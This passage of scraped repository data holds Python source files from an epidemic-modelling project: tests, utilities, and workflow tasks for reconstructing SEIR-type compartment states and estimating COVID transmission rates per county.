i,c in enumerate(counties):\n y0={'S': N*(i+1), 'E': 0, 'I1': 0, 'I2': 0, 'I3':0, 'R': 0}\n populations[i] = N*(i+1)\n sim = simulate_discrete_seiiir_deterministic(y0, tf, beta, sigma, gamma, reporting_factor, populations[i], report_delay, tx=tx)\n cumulative_reported_cases[:,i] = sim.cumulative_reported_cases.values\n simT[:,i] = sim.SEIIIR.transmissions\n simS[:,i] = sim.SEIIIR.S\n simE[:,i] = sim.SEIIIR.E\n simI1[:,i] = sim.SEIIIR.I1\n simI2[:,i] = sim.SEIIIR.I2\n simI3[:,i] = sim.SEIIIR.I3\n simR[:,i] = sim.SEIIIR.R\n cumulative_reported_cases_dates = np.asarray(sim.cumulative_reported_cases.dates)\n dates = np.asarray(sim.SEIIIR.dates)\n\n # reconstruct the states\n np.random.seed(42)\n for real in range(100):\n reported_cases_per_day = rcommon.np_reported_cases_from_cumulative(dates=cumulative_reported_cases_dates,\n counties=counties,\n cumulative_reported_cases=cumulative_reported_cases)\n\n recon = recons.np_stochastic_reconstruction(dates=reported_cases_per_day.dates,\n counties=reported_cases_per_day.counties,\n reported_cases_per_day=reported_cases_per_day.values,\n populations=populations,\n n_steps_per_day=4)\n\n realization_df = _long_dataframe_from_recon(recon)\n realization_df['realization'] = real\n if real == 0:\n recon_df = realization_df\n else:\n recon_df = pd.concat([recon_df, realization_df])\n\n abstol=4\n dfsimS = pd.DataFrame(index=dates, columns=counties, data=simS)\n _special_tolerance_check(dfsimS, recon_df, 'S', abstol, 0.05)\n dfsimE = pd.DataFrame(index=dates, columns=counties, data=simE)\n _special_tolerance_check(dfsimE, recon_df, 'E', abstol, 0.15)\n dfsimI1 = pd.DataFrame(index=dates, columns=counties, data=simI1)\n _special_tolerance_check(dfsimI1, recon_df, 'I1', abstol, 0.2)\n dfsimI2 = pd.DataFrame(index=dates, columns=counties, data=simI2)\n _special_tolerance_check(dfsimI2, recon_df, 'I2', abstol, 0.2)\n dfsimI3 = pd.DataFrame(index=dates, columns=counties, data=simI3)\n _special_tolerance_check(dfsimI3, recon_df, 'I3', abstol, 0.2)\n dfsimR = pd.DataFrame(index=dates, columns=counties, data=simR)\n _special_tolerance_check(dfsimR, recon_df, 'R', abstol, 0.2)\n \ndef assert_if_mean_significantly_different(df1, df2, abstol, reltol):\n mean = df1.mean(axis=1)\n mean.name = 'mean'\n dferrors = df2.join(mean, how='inner')\n dferrors['errors'] = (dferrors['mean']-dferrors['sim']).abs()\n dferrors['relerrors'] = dferrors['errors'].divide((dferrors['sim']+1))\n # print(dferrors['relerrors'])\n dferrors['flag'] = dferrors['errors'].gt(abstol) & dferrors['relerrors'].gt(reltol)\n nerrs = dferrors['flag'].sum()\n if nerrs > 0:\n print(df1)\n print(df2)\n print(dferrors)\n assert nerrs == 0\n\ndef _special_tolerance_check(dfsim, recon_df, comp, abstol, reltol):\n dfsim.index.name = 'dates'\n mean = recon_df[recon_df['comp']==comp].groupby(['dates','county']).mean().reset_index().pivot(index='dates', columns='county', values='count')\n diff = (mean-dfsim).dropna(how='all')\n reldiff = diff.divide(dfsim[dfsim.index.isin(diff.index)])\n # print('...', comp)\n # print(diff)\n # print(reldiff)\n nerrs = (diff.gt(abstol) & reldiff.gt(reltol)).sum().sum()\n assert nerrs == 0\n\ndef _quantile_check(dfsim, recon_df, comp, counties, lowerq, upperq):\n dfsim.index.name = 'dates'\n # loop over all the counties\n for i,c in enumerate(counties):\n df = recon_df[recon_df['comp']==comp]\n df = df[df['county']==c]\n df = df.pivot(index='dates', columns='realization', values='count')\n lower = df.quantile(lowerq, axis=1)[df.index.isin(dfsim.index)]\n upper = df.quantile(upperq, axis=1)[df.index.isin(dfsim.index)]\n sim = dfsim[c]\n sim = sim[sim.index.isin(lower.index)]\n # print(lower)\n # print(sim)\n # print(upper)\n # print((lower.gt(sim) | sim.gt(upper)))\n nerrs = (lower.gt(sim) | sim.gt(upper)).sum()\n print('Checking compartment:', comp, ' for county: ', c)\n assert nerrs == 0\n\ndef _wide_dataframe_from_recon(recon):\n S = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.S)\n S['comp'] = 'S'\n E = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.E)\n E['comp'] = 'E'\n I1 = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.I1)\n I1['comp'] = 'I1'\n I2 = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.I2)\n I2['comp'] = 'I2'\n I3 = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.I3)\n I3['comp'] = 'I3'\n R = pd.DataFrame(index=recon.dates, columns=recon.counties, data=recon.R)\n R['comp'] = 'R'\n return pd.concat([S, E, I1, I2, I3, R])\n\ndef _long_dataframe_from_recon(recon):\n df = None\n for i,c in enumerate(recon.counties):\n S = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.S[:,i])\n S.index.name = 'dates'\n S.reset_index(inplace=True)\n S['comp'] = 'S'\n S['county'] = c\n E = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.E[:,i])\n E.index.name = 'dates'\n E.reset_index(inplace=True)\n E['comp'] = 'E'\n E['county'] = c\n I1 = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.I1[:,i])\n I1.index.name = 'dates'\n I1.reset_index(inplace=True)\n I1['comp'] = 'I1'\n I1['county'] = c\n I2 = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.I2[:,i])\n I2.index.name = 'dates'\n I2.reset_index(inplace=True)\n I2['comp'] = 'I2'\n I2['county'] = c\n I3 = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.I3[:,i])\n I3.index.name = 'dates'\n I3.reset_index(inplace=True)\n I3['comp'] = 'I3'\n I3['county'] = c\n R = pd.DataFrame(index=recon.dates, columns=['count'], data=recon.R[:,i])\n R.index.name = 'dates'\n R.reset_index(inplace=True)\n R['comp'] = 'R'\n R['county'] = c\n\n if df is None:\n df = pd.concat([S, E, I1, I2, I3, R])\n else:\n df = pd.concat([df, S, E, I1, I2, I3, R])\n return df\n" }, { "alpha_fraction": 0.5978639125823975, "alphanum_fraction": 0.6005961298942566, "avg_line_length": 31.200000762939453, "blob_id": "645d192e524b9155c05f54f819a1e69613abd6f5", "content_id": "e03568b2bd4279af1787667b9e58d24193d52d87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4026, "license_type": "no_license", "max_line_length": 130, "num_lines": 125, "path": "/epi_inference/util.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import os\nimport re\n#import itertools\n#from pyutilib.misc import Options\n#import string\nimport datetime\nimport json\nimport pandas as pd\nfrom recursive_diff import recursive_diff\nimport pprint\n\n\ndef roundall(*args):\n \"\"\"\n Pass in any number of lists as arguments, and this function\n will return new lists (in the same order) with all values\n rounded to integers\n \"\"\"\n ret_lists = list()\n for arg in args:\n assert type(arg) is list\n l = [None]*len(arg)\n for i,v in enumerate(arg):\n l[i] = round(v)\n ret_lists.append(l)\n return ret_lists\n\n\n#\n# NOTE: This assumes that it's safe to ignore the time when encoding a datetime object\n#\nclass ToStr_JSONEncoder(json.JSONEncoder):\n\n def default(self, obj):\n if isinstance(obj, datetime.datetime):\n return obj.__str__()\n elif isinstance(obj, datetime.date):\n return obj.__str__()\n #\n # Convert numpy int/float types\n #\n try:\n return int(obj)\n except:\n try:\n return float(obj)\n except:\n pass\n return json.JSONEncoder.default(self, obj)\n\n def _encode(self, obj):\n def transform_date(o):\n return self._encode(o.strftime(\"%Y-%m-%d\") if isinstance(o, datetime.datetime) or isinstance(o, datetime.date) else o)\n if isinstance(obj, dict):\n return {transform_date(k): transform_date(v) for k, v in obj.items()}\n elif isinstance(obj, list) or isinstance(obj, set):\n return [transform_date(l) for l in obj]\n else:\n return obj\n\n def encode(self, obj):\n return super(ToStr_JSONEncoder, self).encode(self._encode(obj))\n\n\ndef load_population(input_csv, index):\n try:\n population_df = pd.read_csv(input_csv, encoding=\"ISO-8859-1\", dtype={index:'str'})\n population_df = population_df.set_index(index)\n except: # pragma: no cover\n raise RuntimeError(\"ERROR reading file \"+input_csv)\n return population_df\n\n\ndef save_results(results, output):\n print(\"Writing results in file \"+output)\n filedir = os.path.dirname(output)\n if not os.path.exists(filedir):\n os.makedirs(filedir)\n with open(output,'w') as OUTPUT:\n json.dump(results, OUTPUT, cls=ToStr_JSONEncoder, indent=4)\n\n\ndef compare_csv(output, gold, index_col=None, check_exact=False, sort=True):\n if index_col is None:\n outputdf = pd.read_csv(output)\n golddf = pd.read_csv(gold)\n else:\n outputdf = pd.read_csv(output, index_col=index_col)\n golddf = pd.read_csv(gold, index_col=index_col)\n\n # the dataframes may be the same, but just in a different order\n if sort:\n columns = list(outputdf.columns)\n outputdf.sort_values(by=columns, inplace=True, ignore_index=True)\n golddf.sort_values(by=columns, inplace=True, ignore_index=True)\n pd.testing.assert_frame_equal(left=outputdf, right=golddf, check_exact=check_exact)\n return outputdf, golddf\n\n\ndef compare_json(output_file, baseline_file, abs_tol=1e-6, skip_keys=None): # pragma: no cover\n with open(output_file,'r') as INPUT:\n output = json.load(INPUT)\n with open(baseline_file,'r') as INPUT:\n baseline = json.load(INPUT)\n diffs = list(recursive_diff(baseline, output, abs_tol=abs_tol))\n\n # process the skip_keys if necessary\n if len(diffs) != 0 and skip_keys is not None:\n unskipped_diffs = list()\n for d in diffs:\n add = True\n for k in skip_keys:\n e = re.compile('.*: Pair {}:.*is in [RL]HS only'.format(k))\n if e.match(d):\n add = False\n break\n if add:\n unskipped_diffs.append(d)\n diffs = unskipped_diffs\n\n if len(diffs) != 0:\n print('DIFFERENCES IN JSON')\n pprint.pprint(diffs)\n assert(len(diffs) == 0)\n return output, baseline\n\n" }, { "alpha_fraction": 0.5989224910736084, "alphanum_fraction": 0.6040107607841492, "avg_line_length": 31.115385055541992, "blob_id": "6bb8de9d2ddcb246f01481659f99e5e6115e0b80", "content_id": "889ae6b3b0e04ae20b90b6f6f7117deea7883061", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3341, "license_type": "no_license", "max_line_length": 135, "num_lines": 104, "path": "/epi_inference/reconstruction/recon_summary_old_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['recon_summary']\n\nimport sys\nimport os.path\ntry:\n import ujson as json\nexcept:\n import json\nimport csv\nimport glob\nimport numpy as np\nimport pandas as pd\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\n\ndef summary_narrow(OUTPUT, reader, scenario_index):\n header = next(reader)\n offset = {header[i]:i for i in range(len(header))}\n #print(\"HEADER:\",header)\n if not scenario_index in header:\n raise RuntimeError(\"The scenario index is not specified in the CSV file: '%s'\" % scenario_index)\n header.remove('value')\n header.remove(scenario_index)\n #\n # Collect data from dataframe\n #\n timing.tic()\n data = {}\n for row in reader:\n key = tuple(row[offset[name]] for name in header)\n if key not in data:\n data[key] = []\n data[key].append( float(row[offset['value']]) )\n timing.toc(\". Collected data\")\n #\n # Create summary CSV\n #\n OUTPUT.write(\",\".join(header+['mean','Q25', 'Q50', 'Q75']))\n OUTPUT.write(\"\\n\")\n for key, vals in data.items():\n #print(key,vals)\n #mean = statistics.mean(vals)\n mean = np.mean(vals)\n #quartiles = statistics.quantiles(vals, method='inclusive')\n quartiles = np.quantile(vals, [0.25, 0.5, 0.75])\n \n results = (str(mean), str(quartiles[0]), str(quartiles[1]), str(quartiles[2]))\n OUTPUT.write(\",\".join(map(str,key + results)))\n OUTPUT.write(\"\\n\")\n timing.toc(\". Wrote summary\")\n\n\ndef recon_summary(input_csv, output_csv, scenario_index, csv_format=None):\n if not os.path.exists(input_csv):\n raise RuntimeError(\"ERROR: Reconstruction CSV file does not exist: \"+ input_csv)\n #\n #print(\"Processing reconstruction file: \"+input_csv)\n #with open(input_csv,'r') as INPUT:\n #df = pd.read_csv(INPUT)\n\n # Write CSV file\n print(\"Writing results summary: \"+output_csv)\n if csv_format == 'wide':\n #with open(full_outfile,'w') as OUTPUT:\n # write_wide(OUTPUT, raw, counties)\n pass\n elif csv_format == 'flatten':\n #with open(full_outfile,'w') as OUTPUT:\n # write_flattened(OUTPUT, full_infile, counties)\n pass\n else:\n with open(output_csv,'w') as OUTPUT:\n with open(input_csv,'r') as INPUT:\n reader = csv.reader(INPUT)\n summary_narrow(OUTPUT, reader, scenario_index)\n\n\nclass Recon_Summary_WorkflowOLD(Task):\n\n def __init__(self):\n Task.__init__(self, \"recon_summary_old\",\n \"Summarize a reconstruction CSV.\")\n\n def validate(self, CONFIG):\n valid_options = set(['format', 'scenario_index', 'input_csv', 'output_csv', 'verbose', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n recon_summary(\n CONFIG['input_csv'],\n output_csv=CONFIG['output_csv'],\n scenario_index=CONFIG['scenario_index'],\n csv_format=CONFIG.get('format','narrow'))\n\n\nregister_task(Recon_Summary_WorkflowOLD())\n\n" }, { "alpha_fraction": 0.6406030058860779, "alphanum_fraction": 0.655678391456604, "avg_line_length": 45.05555725097656, "blob_id": "1153b066ec341e4bcfd2a848ad3baeb70a74e729", "content_id": "f0182c16d156bd365c0be4001a7192c24a3922d6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4975, "license_type": "no_license", "max_line_length": 152, "num_lines": 108, "path": "/epi_inference/formulations/attic/tests/bad_inference.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pytest\nimport os\nimport os.path\nimport pandas as pd\nimport shutil\nfrom pyomo.common import fileutils as fileutils\nfrom pyutilib.misc import Options as Options\nfrom epi_inference.engine import driver\n\n# collect yaml\n# dir, county, days_before_first, days_after_first, output\n\ndef compare_csv(output, gold, index_col, cols_to_compare=None, check_exact=False): # pragma: no cover\n if index_col is None:\n outputdf = pd.read_csv(output)\n golddf = pd.read_csv(gold)\n else:\n outputdf = pd.read_csv(output, index_col=index_col)\n golddf = pd.read_csv(gold, index_col=index_col)\n\n #print(outputdf)\n #print(golddf)\n\n if cols_to_compare is None:\n pd.testing.assert_frame_equal(left=outputdf, right=golddf, check_exact=check_exact)\n else:\n for c in cols_to_compare:\n pd.testing.assert_series_equal(left=outputdf[c], right=golddf[c], check_exact=check_exact)\n\n return outputdf, golddf\n\n\nclass TestInference():\n @classmethod\n def setup_class(cls):\n cls._origdir = os.getcwd()\n thisfiledir = fileutils.this_file_dir()\n os.chdir(thisfiledir)\n\n @classmethod\n def teardown_class(cls):\n os.chdir(cls._origdir)\n\n\n @pytest.mark.skip('inconsistencies in simulated data seems to be causing more cases than population')\n def test_inference_decay_lsq_filter(self):\n args = Options()\n args.config_file = './config_files/inference_decay_lsq_filter.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/results_expdata3_1_all.csv', './baseline/results_expdata3_1_all.csv', index_col=None)\n assert outputdf.shape[0] == 10\n outputdf, golddf = compare_csv('./output/results_expdata3_1_all_lastdays.csv', './baseline/results_expdata3_1_all_lastdays.csv', index_col=None)\n assert outputdf.shape[0] == 10\n \n # cleanup the files we created\n os.remove('./output/results_expdata3_1_all.csv')\n os.remove('./output/results_expdata3_1_all_meta.yml')\n os.remove('./output/results_expdata3_1_all_lastdays.csv')\n os.remove('./output/results_expdata3_1_all_lastdays_meta.yml')\n\n\n @pytest.mark.skip('inconsistencies in simulated data seems to be causing more cases than population')\n def test_inference_exp(self):\n args = Options()\n args.config_file = './config_files/inference_exp.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/results_expdata3_decay-lsq_all.csv', './baseline/results_expdata3_decay-lsq_all.csv', index_col=None)\n assert outputdf.shape[0] == 10\n outputdf, golddf = compare_csv('./output/results_expdata3_inference_all.csv', './baseline/results_expdata3_inference_all.csv', index_col=None)\n assert outputdf.shape[0] == 20\n \n # cleanup the files we created\n os.remove('./output/results_expdata3_decay-lsq_all.csv')\n os.remove('./output/results_expdata3_decay-lsq_all_meta.yml')\n os.remove('./output/results_expdata3_inference_all.csv')\n os.remove('./output/results_expdata3_inference_all_meta.yml')\n \n\n def test_inference_case(self):\n args = Options()\n args.config_file = './config_files/inference_case.yml'\n args.verbose = True\n driver.run(args)\n \n # check that the csv files load into dataframes that have the correct numbers and shapes\n outputdf, golddf = compare_csv('./output/results_countydata1_12121_decay-lsq_all.csv', './baseline/results_countydata1_12121_decay-lsq_all.csv',\n cols_to_compare=['est_beta', 'status', 'FIPS'], index_col=None)\n assert outputdf.shape[0] == 7\n outputdf, golddf = compare_csv('./output/results_county1_inference_all.csv', './baseline/results_county1_inference_all.csv',\n cols_to_compare=['est_beta', 'status', 'FIPS'], index_col=None)\n assert outputdf.shape[0] == 14\n outputdf, golddf = compare_csv('./output/results_countydata1_multinode_all.csv', './baseline/results_countydata1_multinode_all.csv',\n cols_to_compare=['est_beta', 'status'], index_col=None)\n assert outputdf.shape[0] == 1\n \n # cleanup the files we created\n os.remove('./output/results_countydata1_12121_decay-lsq_all.csv')\n os.remove('./output/results_countydata1_12121_decay-lsq_all_meta.yml')\n os.remove('./output/results_county1_inference_all.csv')\n os.remove('./output/results_county1_inference_all_meta.yml')\n os.remove('./output/results_countydata1_multinode_all.csv')\n os.remove('./output/results_countydata1_multinode_all_meta.yml')\n\n" }, { "alpha_fraction": 0.6724637746810913, "alphanum_fraction": 0.6724637746810913, "avg_line_length": 22, "blob_id": "10494c2801c3316dcc739d352965739c8a4abcfa", "content_id": "1a7c8d19acc81a895244ae84e1a29f16e7ced563", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 345, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/epi_inference/engine/task_registry.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['register_task', 'registered_tasks']\n\n#\n# mapping from TaskName -> Task object instance\n#\nglobal_tasks = {}\n\ndef register_task(task):\n if task.name in global_tasks:\n raise RuntimeError(\"Task '%s' has already been registered!\" % task.name)\n global_tasks[task.name] = task\n\n\ndef registered_tasks():\n return global_tasks\n" }, { "alpha_fraction": 0.6674015522003174, "alphanum_fraction": 0.6674015522003174, "avg_line_length": 38.185184478759766, "blob_id": "085d903f09a9e4549d1c93ac40e1dbd3a182c9b6", "content_id": "9d77f0598834c6ff44fd562b88db5bc57eac9808", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3175, "license_type": "no_license", "max_line_length": 212, "num_lines": 81, "path": "/epi_inference/formulations/inference_mobility_windows_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run']\n\nimport sys\ntry:\n import ujson as json\nexcept:\n import json\nfrom pyutilib.misc import timing\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..util import load_population, save_results\nfrom ..formulations.multinode_mobility_window_decay_lsq import run_multinode_mobility_window_decay_lsq\nfrom ..formulations.multinode_mobility_window_decay_lsq_old import run_multinode_mobility_window_decay_lsq_old\nfrom ..formulations.multinode_mobility_window_decay_lsq_poek import run_multinode_mobility_window_decay_lsq_poek\nfrom ..formulations.multinode_mobility_window_decay_lsq_iterative import run_multinode_mobility_window_decay_lsq_iterative\n\n\ndef run(CONFIG, warnings):\n #\n # Load the reconstruction data \n #\n with open(CONFIG['reconstruction_json'],'r') as INPUT:\n recon = json.load(INPUT)\n #\n # Load the mobility data \n #\n with open(CONFIG['mobility_json'],'r') as INPUT:\n mobility = json.load(INPUT)\n #\n # Perform inference\n #\n if True:\n #try:\n if CONFIG.get('version','new') == 'new':\n results = run_multinode_mobility_window_decay_lsq(recon=recon, mobility=mobility, analysis_window=CONFIG['analysis_window'], select_window=CONFIG.get('select_window', None), verbose=CONFIG['verbose'])\n elif CONFIG.get('version','new') == 'poek':\n results = run_multinode_mobility_window_decay_lsq_poek(recon=recon, mobility=mobility, analysis_window=CONFIG['analysis_window'], verbose=CONFIG['verbose'])\n elif CONFIG.get('version') == 'pyomo_old':\n results = run_multinode_mobility_window_decay_lsq_old(recon=recon, mobility=mobility, analysis_window=CONFIG['analysis_window'], verbose=CONFIG['verbose'])\n elif CONFIG.get('version') == 'pyomo_iterative':\n results = run_multinode_mobility_window_decay_lsq_iterative(\n recon=recon,\n mobility=mobility,\n analysis_window=CONFIG['analysis_window'],\n objective=CONFIG.get('objective', 'lsq'),\n select_window=CONFIG.get('select_window', None),\n verbose=CONFIG['verbose'])\n else:\n #except Exception as err:\n print(\"ERROR: Unexpected exception '%s'\" % str(err))\n results = {}\n warnings.append(str(err))\n #\n # Save results\n #\n save_results(results, CONFIG['output_json'])\n save_metadata(CONFIG, warnings)\n\n\nclass InferenceMobilityWindows(Task):\n\n def __init__(self):\n Task.__init__(self, \"estimate_beta_windows_with_mobility\",\n \"Estimate beta over different time windows using inter-county mobility information.\")\n\n def validate(self, args):\n valid_options = set(['reconstruction_json', 'mobility_json', 'output_json', 'version', 'analysis_window', 'select_window', 'verbose', 'factors', 'factor_levels', 'workflow', 'objective'])\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(InferenceMobilityWindows())\n\n" }, { "alpha_fraction": 0.6124401688575745, "alphanum_fraction": 0.612971842288971, "avg_line_length": 36.23762512207031, "blob_id": "48cc7ce4d38de3c025f2ca7c898528d6ce76c865", "content_id": "6e10b63da07cd2cc698d0c7fdf5ad3c6b8606e56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3762, "license_type": "no_license", "max_line_length": 150, "num_lines": 101, "path": "/epi_inference/viz/viz_choropleth_wf.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['run_scenario', 'run_summary']\n\nimport os.path\nimport glob\nimport csv\ntry:\n import ujson as json\nexcept:\n import json\n\nfrom ..engine.task import Task\nfrom ..engine.task_registry import register_task\nfrom ..engine.misc import save_metadata\n\nfrom ..viz.choropleth import create_us_choropleth_scenario, create_us_choropleth_summary\n\n\ndef run_scenario(CONFIG, warnings):\n if not 'input_json' in CONFIG:\n print(\"No 'input_json' value specified\")\n warnings.append(\"No 'input_json' value specified\")\n elif not os.path.exists(CONFIG['input_json']):\n print(\"File %s does not exist\" % CONFIG['input_json'])\n warnings.append(\"File %s does not exist\" % CONFIG['input_json'])\n else:\n with open(CONFIG['input_json'], 'r') as INPUT:\n results_json = json.load(INPUT)\n create_us_choropleth_scenario(results_json=results_json,\n value_key='beta',\n output_html=CONFIG['output_html'],\n description=CONFIG.get('description','Choropleth Plot of Estimated COVID Transmission Rates'),\n show_browser=CONFIG.get('show_browser',None))\n\ndef run_summary(CONFIG, warnings):\n if not 'input_csv' in CONFIG:\n print(\"No 'input_csv' value specified\")\n warnings.append(\"No 'input_csv' value specified\")\n else:\n data = {}\n for filename in glob.glob(CONFIG['input_csv']):\n with open(filename, 'r') as INPUT:\n first = None\n last = None\n for row in csv.reader(INPUT):\n if first is None:\n first = row\n last = row\n FIPS = filename.split('.')[-2].split('_')[-1]\n # NOTE - If we allow the user to specify the date, then we need to keep all the rows...\n data[FIPS] = [{first[i]:last[i] for i in range(len(first))}]\n create_us_choropleth_summary(summary_csv=data,\n value_key='qmean_filtered_est_beta',\n output_html=CONFIG['output_html'],\n description=CONFIG.get('description','Choropleth Plot of Mean Values of Estimated COVID Transmission Rates'),\n show_browser=CONFIG.get('show_browser',None))\n\n\nclass Viz_ChoroplethScenario(Task):\n\n def __init__(self):\n Task.__init__(self, \"viz_choropleth_scenario\",\n \"Create visualization of a single set of estimated beta values.\")\n\n def validate(self, CONFIG):\n valid_options = set(['description', 'input_json', 'output_html', 'show_browser', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run_scenario(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nclass Viz_ChoroplethSummary(Task):\n\n def __init__(self):\n Task.__init__(self, \"viz_choropleth_summary\",\n \"Create visualization of a summary of estimated beta values over a set of scenarios.\")\n\n def validate(self, CONFIG):\n valid_options = set(['description', 'input_csv', 'output_html', 'show_browser', 'verbose', 'output', 'factors', 'factor_levels', 'workflow'])\n for key in CONFIG:\n if key not in valid_options:\n raise RuntimeError(\"Unexpected configuration option: '%s'\" % key)\n\n def run(self, data, CONFIG):\n self._warnings = []\n self.validate(CONFIG)\n run_summary(CONFIG, self._warnings)\n\n def warnings(self):\n return self._warnings\n\n\nregister_task(Viz_ChoroplethScenario())\nregister_task(Viz_ChoroplethSummary())\n\n" }, { "alpha_fraction": 0.6127817034721375, "alphanum_fraction": 0.6309092044830322, "avg_line_length": 41.75379943847656, "blob_id": "95fc380617be2cbbeaf1b7cabbcb9f2e2066c6d8", "content_id": "7d1abf00d0fde84d116b15f3c7d8c4c5f7f9d2fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 14067, "license_type": "no_license", "max_line_length": 187, "num_lines": 329, "path": "/epi_inference/reconstruction/deterministic.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "from datetime import datetime, timedelta\nimport epi_inference.reconstruction.common as common\nimport numpy as np\nfrom pyutilib.misc.misc import Bunch\n\n\"\"\"\nThis module provides methods for simple reconstruction of the populations\nin the compartments from cumulative reported cases. Please see the \ndocumentation for the individual methods below.\n\"\"\"\n\ndef _transmissions_from_reported_cases(*, dates, reported_cases_per_day, reporting_factor, report_delay):\n \"\"\"\n This function computes the list of transmissions (new cases) from the reported\n cases, reporting factor, and the reporting delay. The delay doesn't impact the\n number of transmissions, but does impact the estimated dates those transmissions\n occur.\n\n Parameters\n ----------\n dates : list of python datetime objects\n The days corresponding to the reported cases as datetime objects\n reported_cases_per_day : list of numbers\n The number of reported cases within each day\n reporting_factor : number\n This is the reporting factor. E.g., if reporting_factor=8, then 1 in 8 \n cases are reported\n report_delay : int\n This is the number of days between infection and reporting\n \"\"\"\n assert len(dates) == len(reported_cases_per_day)\n transmissions = [reporting_factor * r for r in reported_cases_per_day]\n report_delta = timedelta(days=report_delay)\n tdates = list()\n for dt in dates:\n tdates.append(dt - report_delta)\n return Bunch(dates=tdates, values=transmissions)\n\ndef _np_transmissions_from_reported_cases(*, dates, counties, reported_cases_per_day, reporting_factor, report_delay):\n \"\"\"\n This function computes the list of transmissions (new cases) from the reported\n cases, reporting factor, and the reporting delay. The delay doesn't impact the\n number of transmissions, but does impact the estimated dates those transmissions\n occur.\n\n Parameters\n ----------\n dates : numpy array of datetime objects\n array of datetime objects corresponding to the rows of reported_cases_per_day\n counties : numpy chararray\n the names of the counties (or nodes) corresponding to the coumns in the\n reported_cases_per_day\n reported_cases_per_day : Numpy two-dimensional array\n This is a numpy array that contains the reported cases per day. Each row\n corresponds to a different day, and each column is a different county (node).\n reporting_factor : number\n This is the reporting factor. E.g., if reporting_factor=8, then 1 in 8 \n cases are reported\n report_delay : int\n This is the number of days between infection and reporting\n \"\"\"\n # check the types\n assert isinstance(dates, np.ndarray) and dates.dtype == np.object\n assert isinstance(counties, np.ndarray) and counties.dtype == np.object\n \n assert len(dates) == reported_cases_per_day.shape[0]\n assert len(counties) == reported_cases_per_day.shape[1]\n transmissions = reporting_factor * reported_cases_per_day\n report_delta = timedelta(days=report_delay)\n transmission_dates = np.asarray([dates[i] - report_delta for i in range(len(dates))])\n return Bunch(dates=transmission_dates, values=transmissions)\n\n\ndef reconstruct_states_deterministic_decay(*, dates, reported_cases_per_day, population, sigma, gamma, reporting_factor, report_delay, county=None, warnings=None):\n \"\"\"\n This function reconstructs the state of the system using the\n cumulative reported cases and assuming a constant reporting\n delay. Using this and the reporting factor, we can compute the\n approximate transmissions each day. These are then used to\n reconstruct the other states, assuming a discrete time model with\n a simple decay term for leaving the E, I1, I2, and I3\n compartments. The model is discretized by days.\n \n Parameters\n ----------\n dates : list\n list of datetime objects corresponding to the dates of the reported_cases_per_day\n\n reported_cases_per_day : list\n list of the reported cases per day\n\n population : number\n This is the overall population\n\n sigma : float\n This is the rate of transfer out of the exposed compartment (e.g., 1/(incubation period))\n\n gamma : float\n This model includes 3 infectious compartments. Therefore this is an approximation of the \n overall rate of transfer out of the I compartment. Here, we create three compartments,\n each with a rate of 3*gamma (where gamma is 1/(infectious period))\n\n reporting_factor : float\n This factor accounts for under-reporting. If reporting_factor=8, then 1 in 8 cases are reported\n\n report_delay : int\n This is the number of days between infection and reporting\n\n county : string\n The county name, used for debugging output\n\n warnings : list\n A list that can be used to store warnings for the user\n\n Returns\n -------\n tuple : (dates, T, S, E, I1, I2, I3, R)\n dates: dates corresponding to the states in the model\n T: list of new transmissions\n S: list of susceptible population values\n E: list of exposed population values\n I1, I2, I3: lists of infective counts in I1, I2, and I3 compartments respectively\n R: list of recovered population values\n \"\"\"\n assert population > 1\n assert sigma >=0\n assert gamma >= 0\n assert reporting_factor >= 1\n assert report_delay >= 1 and type(report_delay) is int\n\n transmissions = _transmissions_from_reported_cases(dates=dates,\n reported_cases_per_day=reported_cases_per_day,\n reporting_factor=reporting_factor,\n report_delay=report_delay)\n transmission_dates = 